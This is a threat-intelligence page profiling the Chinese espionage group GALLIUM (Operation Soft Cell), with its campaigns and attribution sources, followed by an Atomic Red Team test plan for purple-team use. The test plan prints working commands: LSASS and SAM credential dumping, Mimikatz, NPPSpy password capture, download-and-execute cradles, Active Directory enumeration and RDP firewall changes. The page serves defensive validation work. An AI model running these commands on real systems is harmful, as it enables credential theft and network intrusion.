gallium

Home/Threat Actor/GALLIUM

Threat Actor

gallium · china · active since 2012

GALLIUM (Operation Soft Cell / Granite Typhoon / Alloy Taurus / BRONZE ATLAS / G0093) is a Chinese state-sponsored cyber- espionage actor active since at least 2012 with a defining mission specialization: sustained compromise of global telecommunications providers for bulk Call Detail Record, subscriber-metadata, and communications-content collection supporting PRC dissident-tracking, diplomatic-collection, and economic-intelligence objectives.

public-attribution baseline established by the June 25, 2019 Cybereason 'Operation Soft Cell' and December 12, 2019 Microsoft 'GALLIUM: Targeting Global Telecom' disclosures documenting multi-wave compromise of at least 10 major telecommunications providers globally with full network takeovers and attacker-created domain admin accounts.

targeting spans Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam, with subsequent expansion across Southeast Asia, the Middle East, Africa, and Europe and sectoral expansion to government and financial-services targets (Palo Alto Unit 42 June 2022)

technically distinguished by initial access via unpatched internet-facing services (WildFly/JBoss early, Exchange ProxyLogon/ProxyShell, Log4Shell), China Chopper web-shell persistence, modified Soft Cell Mimikatz variants with distinctive PDB paths sharing lineage with the 2023 SentinelLABS Operation Tainted Love mim221 capability, the PingPull custom backdoor with signature ICMP-tunneling C2 (Unit 42 June 2022), PoisonIvy / gh0st RAT / HTran / Quarian / HighTide implant family, heavy DLL side-loading via legitimately-signed binaries, and use of Taiwan-based servers exclusive to GALLIUM as an infrastructure-attribution pillar; the broader Chinese-state telecom-collection mission spans multiple coordinated clusters including GALLIUM, Salt Typhoon (whose 2024 disclosure of broad US-telecom CALEA-related-systems compromise raised questions about operational overlap), Volt Typhoon, and APT41 sub-clusters tracked separately.

china confidence: high 16 aliases MITRE ATT&CK G0093 ↗

Sigma rules200 YARA rules101 Live IOCs19 CVEs exploited17

⬢

Profile

GALLIUM (Operation Soft Cell / Granite Typhoon / Alloy Taurus / Operation Tainted Love overlap / BRONZE ATLAS overlap / G0093) is a Chinese state-sponsored cyber-espionage actor active since at least 2012 with a defining mission specialization: sustained compromise of global telecommunications providers for bulk Call Detail Record (CDR), subscriber-metadata, and communications- content collection. Public attribution rests on tooling and TTP overlap with broader Chinese state-actor patterns (notably APT10 / Stone Panda and APT41 / Wicked Panda), exclusive use of Taiwan-based command-and-control infrastructure, and targeting consistent with PRC strategic-intelligence priorities. Specific PRC unit affiliation has not been publicly named, GALLIUM's precise organizational placement within China's MSS provincial bureau system versus broader contractor ecosystem remains a gap in open-source attribution. The June 25, 2019 Cybereason Operation Soft Cell disclosure and the December 12, 2019 Microsoft GALLIUM disclosure together established the public-attribution baseline, documenting multi-wave compromise of at least 10 major telecommunications providers globally with full network takeovers including attacker-created domain admin accounts. The pattern was sustained CDR collection on specific high-value subscriber targets, supporting PRC dissident-tracking, diplomatic- collection, and economic-intelligence objectives. Targeted regions span at minimum Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam, with subsequent expansion to wider Southeast Asia, the Middle East, Africa, and Europe. Tradecraft is characteristic of the broader Chinese-state ecosystem with several distinguishing features: (a) initial access via unpatched internet-facing services, particularly WildFly / JBoss application servers in early operations, then heavy Microsoft Exchange exploitation (ProxyLogon and ProxyShell chains), Log4Shell, and a sustained pattern of n-day exploitation rather than zero-day development; (b) China Chopper web-shell deployment as the persistent foothold pattern.

(c) modified Soft Cell Mimikatz variants with distinctive PDB paths (the 2023 SentinelLABS Operation Tainted Love disclosure identified the mim221 versioned credential-theft capability sharing PDB-path lineage with the Operation Soft Cell Mimikatz)

(d) the PingPull custom backdoor with signature ICMP-tunneling C2 (Unit 42 June 2022), ICMP tunneling exploits the gap that few enterprises deep-inspect ICMP traffic.

(e) PoisonIvy, gh0st RAT, HTran proxying tools, Quarian, and HighTide as the broader implant family.

(f) heavy DLL side-loading via legitimately-signed binaries (the broader Chinese state-actor pattern)

(g) sustained operational tempo across more than a decade with continuous tooling-development investment. The September 2024 disclosure of Salt Typhoon's broad compromise of US telecommunications providers (including CALEA-related systems for lawful-intercept access) raised questions about operational overlap with the historical GALLIUM / Soft Cell mission set.

Microsoft tracks Salt Typhoon as a separate cluster but the broader Chinese-state telecom- collection mission spans multiple coordinated clusters including GALLIUM, Salt Typhoon, Volt Typhoon, and APT41 sub-clusters.

☉

Aliases

galliumoperation soft celloperation softcellsoft cellsoftcellgranite typhoonbronze atlasbronze_atlasalloy taurusalloy_taurusoperation tainted loveoperation_tainted_lovemssministry of state securitychina state securityg0093

⌖

Notable Campaigns

2024-2026Sustained Telecom Sector Collection (2024-2026)
2024Salt Typhoon US Telecom Compromise Adjacent Activity (2024)
2023Microsoft Granite Typhoon Renaming (2023)
2023Operation Tainted Love (SentinelLABS / QGroup March 2023)
2022PingPull Backdoor and Sectoral Expansion (Palo Alto Unit 42 June 13, 2022)
2019Operation Soft Cell Public Disclosure (Cybereason June 25, 2019)
2019Microsoft GALLIUM, Targeting Global Telecom (December 12, 2019)
2012-2018Early Telecom Operations (2012-2018)

★

Attribution & Reporting

Attributed by

FBICISANSAUK NCSCFive EyesMicrosoftMandiantGoogle Cloud Threat IntelligenceCrowdStrikeCybereasonCybereason NocturnusPalo Alto Networks Unit 42SentinelOneSentinelLABSQGroupSymantec / BroadcomTrend MicroCisco TalosRecorded FutureInsikt GroupSecureWorksESETKasperskyCheck Point ResearchMandiant Threat IntelligenceIndustrial CyberAttackIQ

Key reporting

reportCybereason Nocturnus: Operation Soft Cell, A Worldwide Campaign Against Telecommunications Providers (June 25, 2019)

reportMicrosoft Threat Intelligence Center: GALLIUM, Targeting Global Telecom (December 12, 2019)

reportPalo Alto Networks Unit 42: GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool (June 13, 2022)

reportPalo Alto Networks Unit 42: Alloy Taurus Atom Page

reportSentinelLABS + QGroup: Operation Tainted Love, Chinese APTs Target Telcos in New Attacks (March 2023)

reportSentinelLABS: Lifting the Soft Cell Cluster

reportAttackIQ: Emulating the Highly Elusive Chinese Adversary Gallium (July 2023)

reportCybereason: Using MITRE ATT&CK to Identify Advanced Threats, Operation Soft Cell Webinar

reportIndustrial Cyber: GALLIUM APT Group Uses PingPull Malware (2022)

reportRecorded Future / Insikt Group: Chinese State-Sponsored Targeting of Telecom

reportCrowdStrike: Adversary Profile, BRONZE ATLAS

reportSecureWorks: BRONZE ATLAS Threat Group Profile

reportMandiant: Southeast Asia, An Evolving Cyber Threat Landscape

reportCouncil on Foreign Relations: GALLIUM Cyber Operations Tracker

reportEuRepoC: APT Profile, GALLIUM

18 source links

https://attack.mitre.org/groups/G0093/

https://www.cybereason.com/blog/research/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

https://www.cybereason.com/operation-soft-cell-worldwide-cyberattack-against-telcos

https://www.microsoft.com/en-us/security/blog/2019/12/12/gallium-targeting-global-telecom/

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

https://unit42.paloaltonetworks.com/pingpull-gallium/

https://unit42.paloaltonetworks.com/atoms/alloy-taurus/

https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/

https://www.sentinelone.com/labs/lifting-the-soft-cell-cluster/

https://www.attackiq.com/2023/07/28/emulating-gallium/

https://industrialcyber.co/vulnerabilities/gallium-apt-group-uses-pingpull-malware-to-target-telecommunications-finance-government-organizations/

https://www.recordedfuture.com/research/chinese-state-sponsored-targeting-telecom

https://www.crowdstrike.com/blog/who-is-bronze-atlas/

https://www.secureworks.com/research/bronze-atlas

https://www.mandiant.com/resources/blog/southeast-asia-an-evolving-cyber-threat-landscape

https://malpedia.caad.fkie.fraunhofer.de/actor/gallium

https://eurepoc.eu/publication/apt-profile-gallium/

https://www.cfr.org/cyber-operations/gallium

⬡

Operational

State sponsor

People's Republic of China (PRC), assessed by Microsoft, Cybereason, Palo Alto Networks Unit 42, SentinelOne, and others as a likely Chinese state-sponsored group based on tooling, TTPs, infrastructure overlap with other Chinese-attributed clusters (notably APT10 / Stone Panda, APT41), use of Taiwan-based servers exclusive to GALLIUM, and targeting aligned with PRC strategic-intelligence priorities. Microsoft taxonomy places the cluster as Granite Typhoon. Specific PRC government affiliation (MSS provincial unit vs. broader contractor ecosystem) not publicly attributed to a named entity.

Motivations

espionage, intelligence_gathering, telecommunications_surveillance, call_detail_record_collection, communications_metadata_collection, subscriber_data_collection, dissident_tracking, diplomatic_intelligence, economic_intelligence, government_intelligence, regional_dominance, chinese_diaspora_surveillance

Sectors

Regions

◈

Detection Blind Spots

60 techniques

Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.

Behavioral / log (Sigma)56/60 · 93%

Analytics (MITRE CAR)36/60 · 60%

Runtime / container (Falco)5/60 · 8%

File / malware (YARA)0/60 · 0%

Network (Suricata/Snort)13/60 · 21%

Vuln scan (Nuclei)0/60 · 0%

▸

Atomic Test Plan

30 techniques

Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

T1003 OS Credential Dumping · 7 tests

command_promptelevatedwindowsGsecdump

"#{gsecdump_exe}" -a

powershellelevatedwindowsCredential Dumping with NPPSpy

Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"

powershellelevatedwindowsDump svchost.exe to gather RDP credentials

$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /config

powershellwindowsDump Credential Manager using keymgr.dll and rundll32.exe

rundll32.exe keymgr,KRShowKeyMgr

powershellwindowsSend NTLM Hash with RPC Test Connection

rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null

T1003.001 LSASS Memory · 14 tests

command_promptelevatedwindowsDump LSASS.exe Memory using ProcDump

"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}

powershellelevatedwindowsDump LSASS.exe Memory using comsvcs.dll

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full

command_promptelevatedwindowsDump LSASS.exe Memory using direct system calls and API unhooking

"#{dumpert_exe}"

command_promptelevatedwindowsDump LSASS.exe Memory using NanoDump

PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"

manualwindowsDump LSASS.exe Memory using Windows Task Manager

command_promptelevatedwindowsOffline Credential Theft With Mimikatz

"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit

command_promptelevatedwindowsLSASS read with pypykatz

"#{venv_path}\Scripts\pypykatz" live lsa

powershellelevatedwindowsDump LSASS.exe Memory using Out-Minidump.ps1

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump

command_promptelevatedwindowsCreate Mini Dump of LSASS.exe using ProcDump

"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}

powershellelevatedwindowsPowershell Mimikatz

IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds

powershellelevatedwindowsDump LSASS with createdump.exe from .Net v5

$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id

powershellelevatedwindowsDump LSASS.exe using imported Microsoft DLLs

#{xordump_exe} -out #{output_file} -x 0x41

powershellelevatedwindowsDump LSASS.exe using lolbin rdrleakdiag.exe

if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."

command_promptelevatedwindowsDump LSASS.exe Memory through Silent Process Exit

PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"

T1003.002 Security Account Manager · 8 tests

command_promptelevatedwindowsRegistry dump of SAM, creds, and secrets

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

command_promptelevatedwindowsRegistry parse with pypykatz

"#{venv_path}\Scripts\pypykatz" live lsa

command_promptelevatedwindowsesentutl.exe SAM copy

esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}

powershellelevatedwindowsPowerDump Hashes and Usernames from Registry

Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump

command_promptwindowsdump volume shadow copy hives with certutil

for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*

powershellwindowsdump volume shadow copy hives with System.IO.File

1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}

powershellwindowsWinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive

command_promptelevatedwindowsDumping of SAM, creds, and secrets(Reg Export)

reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security

T1005 Data from Local System · 3 tests

powershellwindowsSearch files of interest and save them to a single zip file (Windows)

$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }

bashlinuxFind and dump sqlite databases (Linux)

cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;

shmacosCopy Apple Notes database files using AppleScript

osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'

T1012 Query Registry · 6 tests

command_promptelevatedwindowsQuery Registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"

powershellelevatedwindowsQuery Registry with Powershell cmdlets

Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\" | findstr Windows
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServices"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServices"
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
Get-Item -Path "HKCU:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
Get-ChildItem -Path "HKLM:system\currentcontrolset\services" 
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKLM:SYSTEM\CurrentControlSet\Control\SafeBoot"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"

powershellwindowsEnumerate COM Objects in Registry with Powershell

New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > $env:temp\clsids.txt
ForEach($CLSID in Get-Content "$env:temp\clsids.txt")
{try{write-output "$($Position)-$($CLSID)"
write-output "------------"| out-file #{output_file} -append
write-output $($CLSID)| out-file #{output_file} -append
$handle=[activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))
$handle | get-member -erroraction silentlycontinue | out-file #{output_file} -append
$position += 1} catch{}}

command_promptelevatedwindowsReg query for AlwaysInstallElevated status

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

command_promptelevatedwindowsCheck Software Inventory Logging (SIL) status via Registry

reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64

command_promptwindowsInspect SystemStartOptions Value in Registry

reg.exe query HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions

T1016 System Network Configuration Discovery · 9 tests

command_promptwindowsSystem Network Configuration Discovery on Windows

ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config

command_promptwindowsList Windows Firewall Rules

netsh advfirewall firewall show rule name=all

shmacos, linuxSystem Network Configuration Discovery

if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;

command_promptwindowsSystem Network Configuration Discovery (TrickBot Style)

ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts

powershellwindowsList Open Egress Ports

$ports = Get-content "#{port_file}"
$file = "#{output_file}"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
    $test = new-object system.Net.Sockets.TcpClient
    $wait = $test.beginConnect("allports.exposed", $port, $null, $null)
    $wait.asyncwaithandle.waitone(250, $false) | Out-Null
    $totalports++ | Out-Null
    if ($test.Connected) {
        $result = "$port open" 
        Write-Host -ForegroundColor Green $result
        $result | Out-File -Encoding ASCII -append $file
        $totalopen++ | Out-Null
    }
    else {
        $result = "$port closed" 
        Write-Host -ForegroundColor Red $result
        $totalclosed++ | Out-Null
        $result | Out-File -Encoding ASCII -append $file
    }
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -append $file
Write-Host $results

command_promptwindowsAdfind - Enumerate Active Directory Subnet Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}

command_promptwindowsQakbot Recon

"#{recon_commands}"

bashelevatedmacosList macOS Firewall Rules

sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate

command_promptwindowsDNS Server Discovery Using nslookup

nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%

T1018 Remote System Discovery · 22 tests

command_promptwindowsRemote System Discovery - net

net view /domain
net view

command_promptwindowsRemote System Discovery - net group Domain Computers

net group "Domain Computers" /domain

command_promptwindowsRemote System Discovery - nltest

nltest.exe /dclist:#{target_domain}

command_promptwindowsRemote System Discovery - ping sweep

for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i

command_promptwindowsRemote System Discovery - arp

arp -a

shlinux, macosRemote System Discovery - arp nix

arp -a | grep -v '^?'

shlinux, macosRemote System Discovery - sweep

for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done

powershellelevatedwindowsRemote System Discovery - nslookup

$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}

command_promptelevatedwindowsRemote System Discovery - adidnsdump

"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}

command_promptwindowsAdfind - Enumerate Active Directory Computer Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}

command_promptwindowsAdfind - Enumerate Active Directory Domain Controller Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist

shlinuxRemote System Discovery - ip neighbour

ip neighbour show

shlinuxRemote System Discovery - ip route

ip route show

shlinuxRemote System Discovery - netstat

netstat -r | grep default

shlinuxRemote System Discovery - ip tcp_metrics

ip tcp_metrics show |grep --invert-match "^127\."

powershellwindowsEnumerate domain computers within Active Directory using DirectorySearcher

$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
  $Computer = $Computer.Properties.name
  if (!$Computer) { Continue }
  Write-Host $Computer}

powershellwindowsEnumerate Active Directory Computers with Get-AdComputer

Get-AdComputer -Filter *

powershellwindowsEnumerate Active Directory Computers with ADSISearcher

([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()

powershellwindowsGet-DomainController with PowerView

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose

powershellwindowsGet-WmiObject to Enumerate Domain Controllers

try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }

command_promptwindowsRemote System Discovery - net group Domain Controller

net group /domain "Domain controllers"

powershellwindowsEnumerate Remote Hosts with Netscan

cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'

T1021.001 Remote Desktop Protocol · 4 tests

powershellwindowsRDP to DomainController

$Server=#{logonserver}
$User = Join-Path #{domain} #{username}
$Password="#{password}"
cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password
mstsc /v:$Server
echo "RDP connection established"

powershellelevatedwindowsChanging RDP Port to Non Standard Port via Powershell

Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{NEW_Remote_Port}
New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}

command_promptelevatedwindowsChanging RDP Port to Non Standard Port via Command_Prompt

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}

